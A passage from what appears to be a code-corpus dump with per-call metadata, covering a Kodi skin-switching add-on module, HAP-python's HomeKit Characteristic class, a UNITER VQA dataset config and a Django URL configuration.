'tf.compat.v1.saved_model.signature_def_utils.predict_signature_def', (), '', True, 'import tensorflow as tf\n')]
rrosajp/script.ezclean
script.ezclean/resources/lib/modules/skinz.py
ed6fbe6441713a3c96ce15a595cdd5c69291355f
# -*- coding: UTF-8 -*-
import os, re, shutil, time, xbmc
from resources.lib.modules import control
try: import json as simplejson
except: import simplejson

ADDONS = os.path.join(control.HOMEPATH, 'addons')


def currSkin():
    return control.skin


def getOld(old):
    try:
        old = '"%s"' % old
        query = '{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":%s}, "id":1}' % (old)
        response = control.jsonrpc(query)
        response = simplejson.loads(response)
        if response.has_key('result'):
            if response['result'].has_key('value'):
                return response ['result']['value']
    except: pass
    return None


def setNew(new, value):
    try:
        new = '"%s"' % new
        value = '"%s"' % value
        query = '{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":%s,"value":%s}, "id":1}' % (new, value)
        response = control.jsonrpc(query)
    except: pass
    return None


def swapSkins(skin):
    old = 'lookandfeel.skin'
    value = skin
    current = getOld(old)
    new = old
    setNew(new, value)


def lookandFeelData(do='save'):
    scan = ['lookandfeel.enablerssfeeds', 'lookandfeel.font', 'lookandfeel.rssedit', 'lookandfeel.skincolors', 'lookandfeel.skintheme', 'lookandfeel.skinzoom', 'lookandfeel.soundskin', 'lookandfeel.startupwindow', 'lookandfeel.stereostrength']
    if do == 'save':
        for item in scan:
            query = '{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"%s"}, "id":1}' % (item)
            response = control.jsonrpc(query)
            if not 'error' in response:
                match = re.compile('{"value":(.+?)}').findall(str(response))
                control.setSetting(item.replace('lookandfeel', 'default'), match[0])
                control.log("%s saved to %s" % (item, match[0]))
    else:
        for item in scan:
            value = setting(item.replace('lookandfeel', 'default'))
            query = '{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"%s","value":%s}, "id":1}' % (item, value)
            response = control.jsonrpc(query)
            control.log("%s restored to %s" % (item, value))


def defaultSkin():
    control.log("[Default Skin Check]")
    tempgui = os.path.join(USERDATAPATH, 'guitemp.xml')
    gui = tempgui if os.path.exists(tempgui) else GUISETTINGS
    if not os.path.exists(gui): return False
    control.log("Reading gui file: %s" % gui)
    guif = open(gui, 'r+')
    msg = guif.read().replace('\n','').replace('\r','').replace('\t','').replace(' ',''); guif.close()
    control.log("Opening gui settings")
    match = re.compile('<lookandfeel>.+?<ski.+?>(.+?)</skin>.+?</lookandfeel>').findall(msg)
    control.log("Matches: %s" % str(match))
    if len(match) > 0:
        skinid = match[0]
        addonxml = os.path.join(ADDONS, match[0], 'addon.xml')
        if os.path.exists(addonxml):
            addf = open(addonxml, 'r+')
            msg2 = addf.read().replace('\n','').replace('\r','').replace('\t',''); addf.close()
            match2 = re.compile('<addon.+?ame="(.+?)".+?>').findall(msg2)
            if len(match2) > 0: skinname = match2[0]
            else: skinname = 'no match'
        else: skinname = 'no file'
        control.log("[Default Skin Check] Skin name: %s" % skinname)
        control.log("[Default Skin Check] Skin id: %s" % skinid)
        control.setSetting('defaultskin', skinid)
        control.setSetting('defaultskinname', skinname)
        control.setSetting('defaultskinignore', 'false')
    if os.path.exists(tempgui):
        control.log("Deleting Temp Gui File.")
        os.remove(tempgui)
    control.log("[Default Skin Check] End")


def checkSkin():
    control.loga("Invalid Skin Check Start")
    DEFAULTSKIN = setting('defaultskin')
    DEFAULTNAME = setting('defaultskinname')
    DEFAULTIGNORE = setting('defaultskinignore')
    gotoskin = False
    if not DEFAULTSKIN == '':
        if os.path.exists(os.path.join(ADDONS, DEFAULTSKIN)):
            if DIALOG.yesno(AddonTitle, "[COLOR %s]It seems that the skin has been set back to [COLOR %s]%s[/COLOR]" % (COLOR2, COLOR1, SKIN[5:].title()), "Would you like to set the skin back to:[/COLOR]", '[COLOR %s]%s[/COLOR]' % (COLOR1, DEFAULTNAME)):
                gotoskin = DEFAULTSKIN
                gotoname = DEFAULTNAME
            else: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true'); gotoskin = False
        else: control.setSetting('defaultskin', ''); control.setSetting('defaultskinname', ''); DEFAULTSKIN = ''; DEFAULTNAME = ''
    if DEFAULTSKIN == '':
        skinname = []
        skinlist = []
        for folder in glob.glob(os.path.join(ADDONS, 'skin.*/')):
            xml = "%s/addon.xml" % folder
            if os.path.exists(xml):
                f = open(xml,mode='r'); g = f.read().replace('\n','').replace('\r','').replace('\t',''); f.close();
                match = re.compile('<addon.+?id="(.+?)".+?>').findall(g)
                match2 = re.compile('<addon.+?name="(.+?)".+?>').findall(g)
                control.loga("%s: %s" % (folder, str(match[0])))
                if len(match) > 0: skinlist.append(str(match[0])); skinname.append(str(match2[0]))
                else: control.loga("ID not found for %s" % folder)
            else: control.loga("ID not found for %s" % folder)
        if len(skinlist) > 0:
            if len(skinlist) > 1:
                if DIALOG.yesno(control.AddonTitle, "[COLOR %s]It seems that the skin has been set back to [COLOR %s]%s[/COLOR]" % (COLOR2, COLOR1, SKIN[5:].title()), "Would you like to view a list of avaliable skins?[/COLOR]"):
                    choice = DIALOG.select("Select skin to switch to!", skinname)
                    if choice == -1: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true')
                    else:
                        gotoskin = skinlist[choice]
                        gotoname = skinname[choice]
                else: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true')
            else:
                if DIALOG.yesno(control.AddonTitle, "It seems that the skin has been set back to [B]%s[/B]" % (SKIN[5:].title()), "Would you like to set the skin back to: ", '[B] %s [/B]' % (skinname[0])):
                    gotoskin = skinlist[0]
                    gotoname = skinname[0]
                else: control.loga("Skin was not reset"); control.setSetting('defaultskinignore', 'true')
        else: control.loga("No skins found in addons folder."); control.setSetting('defaultskinignore', 'true'); gotoskin = False
    if gotoskin:
        swapSkins(gotoskin)
        x = 0
        control.sleep(1000)
        while not control.condVisibility("Window.isVisible(yesnodialog)") and x < 150:
            x += 1
            control.sleep(200)
        if control.condVisibility("Window.isVisible(yesnodialog)"):
            control.execute('SendClick(11)')
            lookandFeelData('restore')
        else: control.Notify(control.AddonTitle,'Skin Swap Timed Out!')
    control.loga("Invalid Skin Check End")
[((9, 9, 9, 49), 'os.path.join', 'os.path.join', ({(9, 22, 9, 38): 'control.HOMEPATH', (9, 40, 9, 48): '"""addons"""'}, {}), "(control.HOMEPATH, 'addons')", False, 'import os, re, shutil, time, xbmc\n'), ((68, 4, 68, 39), 'resources.lib.modules.control.log', 'control.log', ({(68, 16, 68, 38): '"""[Default Skin Check]"""'}, {}), "('[Default Skin Check]')", False, 'from resources.lib.modules import control\n'), ((69, 14, 69, 55), 'os.path.join', 'os.path.join', ({(69, 27, 69, 39): 'USERDATAPATH', (69, 41, 69, 54): '"""guitemp.xml"""'}, {}), "(USERDATAPATH, 'guitemp.xml')", False, 'import os, re, shutil, time, xbmc\n'), ((72, 4, 72, 45), 'resources.lib.modules.control.log', 'control.log', ({(72, 16, 72, 44): "('Reading gui file: %s' % gui)"}, {}), "('Reading gui file: %s' % gui)", False, 'from resources.lib.modules import control\n'), ((75, 4, 75, 39), 'resources.lib.modules.control.log', 'control.log', ({(75, 16, 75, 38): '"""Opening gui settings"""'}, {}), "('Opening gui settings')", False, 'from resources.lib.modules import control\n'), ((93, 7, 93, 30), 'os.path.exists', 'os.path.exists', ({(93, 22, 93, 29): 'tempgui'}, {}), '(tempgui)', False, 'import os, re, shutil, time, xbmc\n'), ((96, 4, 96, 43), 'resources.lib.modules.control.log', 'control.log', ({(96, 16, 96, 42): '"""[Default Skin Check] End"""'}, {}), "('[Default Skin Check] End')", False, 'from resources.lib.modules import control\n'), ((100, 4, 100, 44), 'resources.lib.modules.control.loga', 'control.loga', ({(100, 17, 100, 43): '"""Invalid Skin Check Start"""'}, {}), "('Invalid Skin Check Start')", False, 'from resources.lib.modules import control\n'), ((151, 4, 151, 42), 'resources.lib.modules.control.loga', 'control.loga', ({(151, 17, 151, 41): '"""Invalid Skin Check End"""'}, {}), "('Invalid Skin Check End')", False, 'from resources.lib.modules import control\n'), ((20, 19, 20, 41), 'resources.lib.modules.control.jsonrpc', 'control.jsonrpc', ({(20, 35, 20, 40): 'query'}, {}), '(query)', False, 'from resources.lib.modules import control\n'), ((21, 19, 21, 45), 'simplejson.loads', 'simplejson.loads', ({(21, 36, 21, 44): 'response'}, {}), '(response)', False, 'import simplejson\n'), ((35, 19, 35, 41), 'resources.lib.modules.control.jsonrpc', 'control.jsonrpc', ({(35, 35, 35, 40): 'query'}, {}), '(query)', False, 'from resources.lib.modules import control\n'), ((70, 21, 70, 44), 'os.path.exists', 'os.path.exists', ({(70, 36, 70, 43): 'tempgui'}, {}), '(tempgui)', False, 'import os, re, shutil, time, xbmc\n'), ((71, 11, 71, 30), 'os.path.exists', 'os.path.exists', ({(71, 26, 71, 29): 'gui'}, {}), '(gui)', False, 'import os, re, shutil, time, xbmc\n'), ((80, 19, 80, 62), 'os.path.join', 'os.path.join', ({(80, 32, 80, 38): 'ADDONS', (80, 40, 80, 48): 'match[0]', (80, 50, 80, 61): '"""addon.xml"""'}, {}), "(ADDONS, match[0], 'addon.xml')", False, 'import os, re, shutil, time, xbmc\n'), ((81, 11, 81, 35), 'os.path.exists', 'os.path.exists', ({(81, 26, 81, 34): 'addonxml'}, {}), '(addonxml)', False, 'import os, re, shutil, time, xbmc\n'), ((88, 8, 88, 68), 'resources.lib.modules.control.log', 'control.log', ({(88, 20, 88, 67): "('[Default Skin Check] Skin name: %s' % skinname)"}, {}), "('[Default Skin Check] Skin name: %s' % skinname)", False, 'from resources.lib.modules import control\n'), ((89, 8, 89, 64), 'resources.lib.modules.control.log', 'control.log', ({(89, 20, 89, 63): "('[Default Skin Check] Skin id: %s' % skinid)"}, {}), "('[Default Skin Check] Skin id: %s' % skinid)", False, 'from resources.lib.modules import 
control\n'), ((90, 8, 90, 49), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(90, 27, 90, 40): '"""defaultskin"""', (90, 42, 90, 48): 'skinid'}, {}), "('defaultskin', skinid)", False, 'from resources.lib.modules import control\n'), ((91, 8, 91, 55), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(91, 27, 91, 44): '"""defaultskinname"""', (91, 46, 91, 54): 'skinname'}, {}), "('defaultskinname', skinname)", False, 'from resources.lib.modules import control\n'), ((92, 8, 92, 56), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(92, 27, 92, 46): '"""defaultskinignore"""', (92, 48, 92, 55): '"""false"""'}, {}), "('defaultskinignore', 'false')", False, 'from resources.lib.modules import control\n'), ((94, 8, 94, 46), 'resources.lib.modules.control.log', 'control.log', ({(94, 20, 94, 45): '"""Deleting Temp Gui File."""'}, {}), "('Deleting Temp Gui File.')", False, 'from resources.lib.modules import control\n'), ((95, 8, 95, 26), 'os.remove', 'os.remove', ({(95, 18, 95, 25): 'tempgui'}, {}), '(tempgui)', False, 'import os, re, shutil, time, xbmc\n'), ((143, 8, 143, 27), 'resources.lib.modules.control.sleep', 'control.sleep', ({(143, 22, 143, 26): '(1000)'}, {}), '(1000)', False, 'from resources.lib.modules import control\n'), ((147, 11, 147, 66), 'resources.lib.modules.control.condVisibility', 'control.condVisibility', ({(147, 34, 147, 65): '"""Window.isVisible(yesnodialog)"""'}, {}), "('Window.isVisible(yesnodialog)')", False, 'from resources.lib.modules import control\n'), ((54, 23, 54, 45), 'resources.lib.modules.control.jsonrpc', 'control.jsonrpc', ({(54, 39, 54, 44): 'query'}, {}), '(query)', False, 'from resources.lib.modules import control\n'), ((63, 23, 63, 45), 'resources.lib.modules.control.jsonrpc', 'control.jsonrpc', ({(63, 39, 63, 44): 'query'}, {}), '(query)', False, 'from resources.lib.modules import control\n'), ((64, 12, 64, 60), 'resources.lib.modules.control.log', 'control.log', ({(64, 24, 64, 59): "('%s restored to %s' % (item, value))"}, {}), "('%s restored to %s' % (item, value))", False, 'from resources.lib.modules import control\n'), ((76, 12, 76, 79), 're.compile', 're.compile', ({(76, 23, 76, 78): '"""<lookandfeel>.+?<ski.+?>(.+?)</skin>.+?</lookandfeel>"""'}, {}), "('<lookandfeel>.+?<ski.+?>(.+?)</skin>.+?</lookandfeel>')", False, 'import os, re, shutil, time, xbmc\n'), ((106, 26, 106, 59), 'os.path.join', 'os.path.join', ({(106, 39, 106, 45): 'ADDONS', (106, 47, 106, 58): 'DEFAULTSKIN'}, {}), '(ADDONS, DEFAULTSKIN)', False, 'import os, re, shutil, time, xbmc\n'), ((111, 14, 111, 51), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(111, 33, 111, 46): '"""defaultskin"""', (111, 48, 111, 50): '""""""'}, {}), "('defaultskin', '')", False, 'from resources.lib.modules import control\n'), ((111, 53, 111, 94), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(111, 72, 111, 89): '"""defaultskinname"""', (111, 91, 111, 93): '""""""'}, {}), "('defaultskinname', '')", False, 'from resources.lib.modules import control\n'), ((115, 32, 115, 63), 'os.path.join', 'os.path.join', ({(115, 45, 115, 51): 'ADDONS', (115, 53, 115, 62): '"""skin.*/"""'}, {}), "(ADDONS, 'skin.*/')", False, 'import os, re, shutil, time, xbmc\n'), ((117, 15, 117, 34), 'os.path.exists', 'os.path.exists', ({(117, 30, 117, 33): 'xml'}, {}), '(xml)', False, 'import os, re, shutil, time, xbmc\n'), ((139, 14, 139, 62), 'resources.lib.modules.control.loga', 'control.loga', ({(139, 27, 139, 61): '"""No skins found in 
addons folder."""'}, {}), "('No skins found in addons folder.')", False, 'from resources.lib.modules import control\n'), ((139, 64, 139, 111), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(139, 83, 139, 102): '"""defaultskinignore"""', (139, 104, 139, 110): '"""true"""'}, {}), "('defaultskinignore', 'true')", False, 'from resources.lib.modules import control\n'), ((146, 12, 146, 30), 'resources.lib.modules.control.sleep', 'control.sleep', ({(146, 26, 146, 29): '(200)'}, {}), '(200)', False, 'from resources.lib.modules import control\n'), ((148, 12, 148, 44), 'resources.lib.modules.control.execute', 'control.execute', ({(148, 28, 148, 43): '"""SendClick(11)"""'}, {}), "('SendClick(11)')", False, 'from resources.lib.modules import control\n'), ((150, 14, 150, 71), 'resources.lib.modules.control.Notify', 'control.Notify', ({(150, 29, 150, 47): 'control.AddonTitle', (150, 48, 150, 70): '"""Skin Swap Timed Out!"""'}, {}), "(control.AddonTitle, 'Skin Swap Timed Out!')", False, 'from resources.lib.modules import control\n'), ((58, 16, 58, 64), 'resources.lib.modules.control.log', 'control.log', ({(58, 28, 58, 63): "('%s saved to %s' % (item, match[0]))"}, {}), "('%s saved to %s' % (item, match[0]))", False, 'from resources.lib.modules import control\n'), ((110, 18, 110, 52), 'resources.lib.modules.control.loga', 'control.loga', ({(110, 31, 110, 51): '"""Skin was not reset"""'}, {}), "('Skin was not reset')", False, 'from resources.lib.modules import control\n'), ((110, 54, 110, 101), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(110, 73, 110, 92): '"""defaultskinignore"""', (110, 94, 110, 100): '"""true"""'}, {}), "('defaultskinignore', 'true')", False, 'from resources.lib.modules import control\n'), ((124, 18, 124, 62), 'resources.lib.modules.control.loga', 'control.loga', ({(124, 31, 124, 61): "('ID not found for %s' % folder)"}, {}), "('ID not found for %s' % folder)", False, 'from resources.lib.modules import control\n'), ((144, 18, 144, 73), 'resources.lib.modules.control.condVisibility', 'control.condVisibility', ({(144, 41, 144, 72): '"""Window.isVisible(yesnodialog)"""'}, {}), "('Window.isVisible(yesnodialog)')", False, 'from resources.lib.modules import control\n'), ((84, 21, 84, 59), 're.compile', 're.compile', ({(84, 32, 84, 58): '"""<addon.+?ame="(.+?)".+?>"""'}, {}), '(\'<addon.+?ame="(.+?)".+?>\')', False, 'import os, re, shutil, time, xbmc\n'), ((123, 22, 123, 66), 'resources.lib.modules.control.loga', 'control.loga', ({(123, 35, 123, 65): "('ID not found for %s' % folder)"}, {}), "('ID not found for %s' % folder)", False, 'from resources.lib.modules import control\n'), ((133, 22, 133, 56), 'resources.lib.modules.control.loga', 'control.loga', ({(133, 35, 133, 55): '"""Skin was not reset"""'}, {}), "('Skin was not reset')", False, 'from resources.lib.modules import control\n'), ((133, 58, 133, 105), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(133, 77, 133, 96): '"""defaultskinignore"""', (133, 98, 133, 104): '"""true"""'}, {}), "('defaultskinignore', 'true')", False, 'from resources.lib.modules import control\n'), ((138, 22, 138, 56), 'resources.lib.modules.control.loga', 'control.loga', ({(138, 35, 138, 55): '"""Skin was not reset"""'}, {}), "('Skin was not reset')", False, 'from resources.lib.modules import control\n'), ((138, 58, 138, 105), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(138, 77, 138, 96): '"""defaultskinignore"""', (138, 98, 138, 104): '"""true"""'}, {}), 
"('defaultskinignore', 'true')", False, 'from resources.lib.modules import control\n'), ((56, 24, 56, 53), 're.compile', 're.compile', ({(56, 35, 56, 52): '"""{"value":(.+?)}"""'}, {}), '(\'{"value":(.+?)}\')', False, 'import os, re, shutil, time, xbmc\n'), ((119, 24, 119, 61), 're.compile', 're.compile', ({(119, 35, 119, 60): '"""<addon.+?id="(.+?)".+?>"""'}, {}), '(\'<addon.+?id="(.+?)".+?>\')', False, 'import os, re, shutil, time, xbmc\n'), ((120, 25, 120, 64), 're.compile', 're.compile', ({(120, 36, 120, 63): '"""<addon.+?name="(.+?)".+?>"""'}, {}), '(\'<addon.+?name="(.+?)".+?>\')', False, 'import os, re, shutil, time, xbmc\n'), ((129, 37, 129, 71), 'resources.lib.modules.control.loga', 'control.loga', ({(129, 50, 129, 70): '"""Skin was not reset"""'}, {}), "('Skin was not reset')", False, 'from resources.lib.modules import control\n'), ((129, 73, 129, 120), 'resources.lib.modules.control.setSetting', 'control.setSetting', ({(129, 92, 129, 111): '"""defaultskinignore"""', (129, 113, 129, 119): '"""true"""'}, {}), "('defaultskinignore', 'true')", False, 'from resources.lib.modules import control\n')]
bdraco/HAP-python
pyhap/characteristic.py
a2a5ce109d08af2f4f5bda4075f2176a98123806
""" All things for a HAP characteristic. A Characteristic is the smallest unit of the smart home, e.g. a temperature measuring or a device status. """ import logging from pyhap.const import ( HAP_PERMISSION_READ, HAP_REPR_DESC, HAP_REPR_FORMAT, HAP_REPR_IID, HAP_REPR_MAX_LEN, HAP_REPR_PERM, HAP_REPR_TYPE, HAP_REPR_VALID_VALUES, HAP_REPR_VALUE, ) from .util import hap_type_to_uuid, uuid_to_hap_type logger = logging.getLogger(__name__) # ### HAP Format ### HAP_FORMAT_BOOL = "bool" HAP_FORMAT_INT = "int" HAP_FORMAT_FLOAT = "float" HAP_FORMAT_STRING = "string" HAP_FORMAT_ARRAY = "array" HAP_FORMAT_DICTIONARY = "dictionary" HAP_FORMAT_UINT8 = "uint8" HAP_FORMAT_UINT16 = "uint16" HAP_FORMAT_UINT32 = "uint32" HAP_FORMAT_UINT64 = "uint64" HAP_FORMAT_DATA = "data" HAP_FORMAT_TLV8 = "tlv8" HAP_FORMAT_DEFAULTS = { HAP_FORMAT_BOOL: False, HAP_FORMAT_INT: 0, HAP_FORMAT_FLOAT: 0.0, HAP_FORMAT_STRING: "", HAP_FORMAT_ARRAY: "", HAP_FORMAT_DICTIONARY: "", HAP_FORMAT_UINT8: 0, HAP_FORMAT_UINT16: 0, HAP_FORMAT_UINT32: 0, HAP_FORMAT_UINT64: 0, HAP_FORMAT_DATA: "", HAP_FORMAT_TLV8: "", } HAP_FORMAT_NUMERICS = ( HAP_FORMAT_INT, HAP_FORMAT_FLOAT, HAP_FORMAT_UINT8, HAP_FORMAT_UINT16, HAP_FORMAT_UINT32, HAP_FORMAT_UINT64, ) # ### HAP Units ### HAP_UNIT_ARC_DEGREE = "arcdegrees" HAP_UNIT_CELSIUS = "celsius" HAP_UNIT_LUX = "lux" HAP_UNIT_PERCENTAGE = "percentage" HAP_UNIT_SECONDS = "seconds" # ### Properties ### PROP_FORMAT = "Format" PROP_MAX_VALUE = "maxValue" PROP_MIN_STEP = "minStep" PROP_MIN_VALUE = "minValue" PROP_PERMISSIONS = "Permissions" PROP_UNIT = "unit" PROP_VALID_VALUES = "ValidValues" PROP_NUMERIC = (PROP_MAX_VALUE, PROP_MIN_VALUE, PROP_MIN_STEP, PROP_UNIT) class CharacteristicError(Exception): """Generic exception class for characteristic errors.""" class Characteristic: """Represents a HAP characteristic, the smallest unit of the smart home. A HAP characteristic is some measurement or state, like battery status or the current temperature. Characteristics are contained in services. Each characteristic has a unique type UUID and a set of properties, like format, min and max values, valid values and others. """ __slots__ = ( "broker", "display_name", "properties", "type_id", "value", "getter_callback", "setter_callback", "service", "_uuid_str", "_loader_display_name", ) def __init__(self, display_name, type_id, properties): """Initialise with the given properties. :param display_name: Name that will be displayed for this characteristic, i.e. the `description` in the HAP representation. :type display_name: str :param type_id: UUID unique to this type of characteristic. :type type_id: uuid.UUID :param properties: A dict of properties, such as Format, ValidValues, etc. 
:type properties: dict """ self.broker = None self.display_name = display_name self.properties = properties self.type_id = type_id self.value = self._get_default_value() self.getter_callback = None self.setter_callback = None self.service = None self._uuid_str = uuid_to_hap_type(type_id) self._loader_display_name = None def __repr__(self): """Return the representation of the characteristic.""" return "<characteristic display_name={} value={} properties={}>".format( self.display_name, self.value, self.properties ) def _get_default_value(self): """Return default value for format.""" if self.properties.get(PROP_VALID_VALUES): return min(self.properties[PROP_VALID_VALUES].values()) value = HAP_FORMAT_DEFAULTS[self.properties[PROP_FORMAT]] return self.to_valid_value(value) def get_value(self): """This is to allow for calling `getter_callback` :return: Current Characteristic Value """ if self.getter_callback: # pylint: disable=not-callable self.value = self.to_valid_value(value=self.getter_callback()) return self.value def to_valid_value(self, value): """Perform validation and conversion to valid value.""" if self.properties.get(PROP_VALID_VALUES): if value not in self.properties[PROP_VALID_VALUES].values(): error_msg = "{}: value={} is an invalid value.".format( self.display_name, value ) logger.error(error_msg) raise ValueError(error_msg) elif self.properties[PROP_FORMAT] == HAP_FORMAT_STRING: value = str(value)[:256] elif self.properties[PROP_FORMAT] == HAP_FORMAT_BOOL: value = bool(value) elif self.properties[PROP_FORMAT] in HAP_FORMAT_NUMERICS: if not isinstance(value, (int, float)): error_msg = "{}: value={} is not a numeric value.".format( self.display_name, value ) logger.error(error_msg) raise ValueError(error_msg) value = min(self.properties.get(PROP_MAX_VALUE, value), value) value = max(self.properties.get(PROP_MIN_VALUE, value), value) return value def override_properties(self, properties=None, valid_values=None): """Override characteristic property values and valid values. :param properties: Dictionary with values to override the existing properties. Only changed values are required. :type properties: dict :param valid_values: Dictionary with values to override the existing valid_values. Valid values will be set to new dictionary. :type valid_values: dict """ if not properties and not valid_values: raise ValueError("No properties or valid_values specified to override.") if properties: self.properties.update(properties) if valid_values: self.properties[PROP_VALID_VALUES] = valid_values try: self.value = self.to_valid_value(self.value) except ValueError: self.value = self._get_default_value() def set_value(self, value, should_notify=True): """Set the given raw value. It is checked if it is a valid value. If not set_value will be aborted and an error message will be displayed. `Characteristic.setter_callback` You may also define a `setter_callback` on the `Characteristic`. This will be called with the value being set as the arg. .. seealso:: Characteristic.value :param value: The value to assign as this Characteristic's value. :type value: Depends on properties["Format"] :param should_notify: Whether a the change should be sent to subscribed clients. Notify will be performed if the broker is set. 
:type should_notify: bool """ logger.debug("set_value: %s to %s", self.display_name, value) value = self.to_valid_value(value) self.value = value if should_notify and self.broker: self.notify() def client_update_value(self, value, sender_client_addr=None): """Called from broker for value change in Home app. Change self.value to value and call callback. """ logger.debug( "client_update_value: %s to %s from client: %s", self.display_name, value, sender_client_addr, ) self.value = value self.notify(sender_client_addr) if self.setter_callback: # pylint: disable=not-callable self.setter_callback(value) def notify(self, sender_client_addr=None): """Notify clients about a value change. Sends the value. .. seealso:: accessory.publish .. seealso:: accessory_driver.publish """ self.broker.publish(self.value, self, sender_client_addr) # pylint: disable=invalid-name def to_HAP(self): """Create a HAP representation of this Characteristic. Used for json serialization. :return: A HAP representation. :rtype: dict """ hap_rep = { HAP_REPR_IID: self.broker.iid_manager.get_iid(self), HAP_REPR_TYPE: self._uuid_str, HAP_REPR_PERM: self.properties[PROP_PERMISSIONS], HAP_REPR_FORMAT: self.properties[PROP_FORMAT], } # HAP_REPR_DESC (description) is optional and takes up # quite a bit of space in the payload. Only include it # if it has been changed from the default loader version if ( not self._loader_display_name or self._loader_display_name != self.display_name ): hap_rep[HAP_REPR_DESC] = self.display_name value = self.get_value() if self.properties[PROP_FORMAT] in HAP_FORMAT_NUMERICS: hap_rep.update( {k: self.properties[k] for k in self.properties.keys() & PROP_NUMERIC} ) if PROP_VALID_VALUES in self.properties: hap_rep[HAP_REPR_VALID_VALUES] = sorted( self.properties[PROP_VALID_VALUES].values() ) elif self.properties[PROP_FORMAT] == HAP_FORMAT_STRING: if len(value) > 64: hap_rep[HAP_REPR_MAX_LEN] = min(len(value), 256) if HAP_PERMISSION_READ in self.properties[PROP_PERMISSIONS]: hap_rep[HAP_REPR_VALUE] = value return hap_rep @classmethod def from_dict(cls, name, json_dict, from_loader=False): """Initialize a characteristic object from a dict. :param json_dict: Dictionary containing at least the keys `Format`, `Permissions` and `UUID` :type json_dict: dict """ type_id = hap_type_to_uuid(json_dict.pop("UUID")) char = cls(name, type_id, properties=json_dict) if from_loader: char._loader_display_name = ( # pylint: disable=protected-access char.display_name ) return char
[((23, 9, 23, 36), 'logging.getLogger', 'logging.getLogger', ({(23, 27, 23, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n')]
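A brief usage sketch of the `Characteristic` class defined above; the temperature UUID and property values are illustrative choices, pyhap is assumed to be installed, and no accessory or broker is attached.

# Standalone sketch: build and update a Characteristic directly.
from uuid import UUID

from pyhap.characteristic import Characteristic

temp_char = Characteristic(
    "CurrentTemperature",
    UUID("00000011-0000-1000-8000-0026BB765291"),  # illustrative type UUID
    {
        "Format": "float",
        "Permissions": ["pr", "ev"],
        "minValue": 0,
        "maxValue": 100,
        "minStep": 0.1,
    },
)

# to_valid_value() clamps and validates the new value; with no broker
# attached, should_notify=False keeps set_value() from calling notify().
temp_char.set_value(21.5, should_notify=False)
print(temp_char.value)  # 21.5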
linxi1158/iMIX
configs/_base_/datasets/uniter/vqa_dataset_uniter.py
af87a17275f02c94932bb2e29f132a84db812002
dataset_type = 'UNITER_VqaDataset'
data_root = '/home/datasets/mix_data/UNITER/VQA/'

train_datasets = ['train']
test_datasets = ['minival']  # name not in use, but have defined one to run

vqa_cfg = dict(
    train_txt_dbs=[
        data_root + 'vqa_train.db',
        data_root + 'vqa_trainval.db',
        data_root + 'vqa_vg.db',
    ],
    train_img_dbs=[
        data_root + 'coco_train2014/',
        data_root + 'coco_val2014',
        data_root + 'vg/',
    ],
    val_txt_db=data_root + 'vqa_devval.db',
    val_img_db=data_root + 'coco_val2014/',
    ans2label_file=data_root + 'ans2label.json',
    max_txt_len=60,
    conf_th=0.2,
    max_bb=100,
    min_bb=10,
    num_bb=36,
    train_batch_size=20480,  # 5120,
    val_batch_size=40960,  # 10240,
)

BUCKET_SIZE = 8192

train_data = dict(
    samples_per_gpu=vqa_cfg['train_batch_size'],
    workers_per_gpu=4,
    pin_memory=True,
    batch_sampler=dict(
        type='TokenBucketSampler',
        bucket_size=BUCKET_SIZE,
        batch_size=vqa_cfg['train_batch_size'],
        drop_last=True,
        size_multiple=8,
    ),
    data=dict(
        type=dataset_type,
        datacfg=vqa_cfg,
        train_or_val=True,
    ),
)

test_data = dict(
    samples_per_gpu=vqa_cfg['val_batch_size'],
    workers_per_gpu=4,
    batch_sampler=dict(
        type='TokenBucketSampler',
        bucket_size=BUCKET_SIZE,
        batch_size=vqa_cfg['val_batch_size'],
        drop_last=False,
        size_multiple=8,
    ),
    pin_memory=True,
    data=dict(
        type=dataset_type,
        datacfg=vqa_cfg,
        train_or_val=False,
    ),
)

post_processor = dict(
    type='Evaluator',
    metrics=[dict(type='UNITER_AccuracyMetric')],
    dataset_converters=[dict(type='UNITER_DatasetConverter')],
)
[]
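A hypothetical way to consume a config such as the one above, assuming an mmcv-style `Config.fromfile` loader (the usual reader for `_base_` configs like this); the printed values follow directly from the fields defined in the file.

# Sketch only: load the dataset config and inspect a couple of fields.
# Assumes mmcv 1.x is installed; newer stacks expose the same API via mmengine.
from mmcv import Config

cfg = Config.fromfile("configs/_base_/datasets/uniter/vqa_dataset_uniter.py")
print(cfg.dataset_type)                # 'UNITER_VqaDataset'
print(cfg.train_data.samples_per_gpu)  # 20480, i.e. vqa_cfg['train_batch_size']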
TonikX/ITMO_ICT_-WebProgramming_2020
students/k3340/laboratory_works/laboratory_works/Arlakov_Denis/laboratiry_work_2_and_3/lab/django-react-ecommerce-master/home/urls.py
ba566c1b3ab04585665c69860b713741906935a0
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include, re_path
from django.views.generic import TemplateView

urlpatterns = [
    path('api-auth/', include('rest_framework.urls')),
    path('rest-auth/', include('rest_auth.urls')),
    path('rest-auth/registration/', include('rest_auth.registration.urls')),
    path('admin/', admin.site.urls),
    path('api/', include('core.api.urls')),
]

if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL,
                           document_root=settings.MEDIA_ROOT)

if not settings.DEBUG:
    urlpatterns += [re_path(r'^.*', TemplateView.as_view(template_name='index.html'))]
